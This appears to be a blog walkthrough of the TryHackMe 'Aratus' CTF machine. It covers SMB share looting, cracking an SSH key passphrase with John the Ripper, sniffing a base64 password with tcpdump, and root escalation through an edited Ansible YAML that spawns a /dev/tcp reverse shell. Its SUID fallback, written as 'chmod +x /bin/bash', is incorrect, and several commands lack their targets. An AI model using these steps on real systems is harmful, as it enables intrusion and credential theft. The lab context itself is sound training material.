Aratus – Walkthrough En | TryHackMe – Write-up

Do you like reading? Do you like to go through tons of text? Aratus has what you need!

Aratus is a CTF medium from TryHackme. Deep enumeration is required to access the system. It is then necessary to show curiosity to manage to root the machine.


Commande :

nmap -T5 -p- -sVC


There are quite a few very interesting open ports, in particular the FTP port (21) et SMB (139,445).

FTP enumeration

We will start with the simplest a priori, the ftp service. You can access it without a password with the ftp or anonymous account

Command :


There is nothing interesting on the ftp server…

Enumération SMB.

It is possible to enumerate ports 139 and 445 manually with the tools smbget, smbclient, smbmap, but it is also possible to do it more automatically with enum4linux.

Command :


It is thus easy to obtain information concerning the shares present, as well as certain usernames.

Recovery of items - temporary share

Access to sharing is open for reading to everyone. There are many folders under folder and file inside the share. There are several techniques to extract all its data.

Command :

smbclient « // share »

(Do not forget the double quotes so as not to be blocked by the space between temporary and share.)

First, we will extract the message-to-simeon.txt file with this command : 

mget message-to-simeon.txt

Message content :


Stop messing with your home directory, you are moving files and directories insecurely!

Just make a folder in /opt for your book project…

Also you password is insecure, could you please change it? It is all over the place now!

 – Theodore

You have to read between the lines and understand that you will probably have to crack a hash. Before you will have to find what to crack in the different texts that we will recover in stride.

Command to retrieve the various elements: 

smbget -R « smb:// share/chapter1 »

It is possible to use this command for all the chapters, it is simple and fast.

It is also possible to do this with a loop, like this:

for i in {1..9}; do smbget -R « smb:// share/chapter$i »; done

Finally, it is possible to connect to the share and encounter these different commands:

smb: \> prompt

smb: \> recurse

smb: \> mget *

Analysis of files recover.

There are many. The easiest way is to go to the essential. We will open the tree with  sublime Text.

Command : 

subl .

In paragraph7.1 text2 there is an SSH key.


IT must be copied into a text file and then cracked with johntheripper.


It is actually protected by a passphrase. We can see it thanks to this mention Proc-Type: 4,ENCRYPTED

Command : 

ssh2john id_rsa > id_rsa.hash

john id_rsa.hash -wordlist=/usr/share/wordlists/rockyou.txt

Connexion ssh - Simeon.

We have Simeon’s passphrase and ssh private key. All you have to do is log in with SSH.

Commande :

chmod 600 id_rsa

ssh simeon@ -i id_rsa

Once connected, linpeas (which must be uploaded to the machine) tells us that it is possible to listen to the traffic.


Which also corresponds to the pcap hint that can be seen on Tryhackme.



We’ll listen to the traffic on lo. On eth1, there is way too much traffic generated by our own ssh connection.

Command :

tcpdump -i lo

Note that there is a http GET connection to /test-auth/index.html. On the other hand, we do not see the content of the request. So we’re going to make a capture again, recording this time, in pcap format.

Command :

tcpdump -i lo -w cap.pcap

You have to wait at least 2 minutes (to have 1 full minute). There is actually a scheduled task that runs every minute to be sure to capture the traffic that is going well.

No possibility to extract the pcap file to Kali.

I failed to do so. You have to open it, and the file is not very readable. But on closer inspection, we see that there is a connection and also an authentication encoded in base64.

Login to Théodore's account

The password once decoded allows access to Theodore’s account with this command :

su theodore


In the /opt folder there are two folders, ansible and script.

Content of the script

Escalade de privilège

There is only one thing you can do to access the root account. You must modify the setup-RedHat.yml file. Indeed, the script cannot be modified, it is not possible to make a path injection, we cannot modify any file whatsoever. Only the setup-RedHat.yml file.

To get to know why this file, you must first do sudo -l.


Launch the script

Command :

sudo -u automation /opt/scripts/

As shown in the following capture, there is an event regarding setup-RedHat.yml.


And it is possible to modify this .yml. There is a « + » at the end of the rights -rw-rw-r–+

Editing the setup-RedHat.yml file

You have to modify the command line to ensure httpd certs… . This is the last part of the yml file. You must also remove the when line, otherwise the reverse shell will not be executed.

Once the modification has been made, you must relaunch the script.

Command :

sudo -u automation /opt/scripts/

Recovery of reverse shell on netcat listener.

The command bash -i >& /dev/tcp/ 0>&1 may not work. In this case, it is possible to assign a SUID to bash with this command :

chmod +x /bin/bash


That’s all folks

Thank you for taking the trouble to come to the site to read this Write-Up

I hope he has more of you and that he taught you new things.

Feel free to leave a comment or share this article.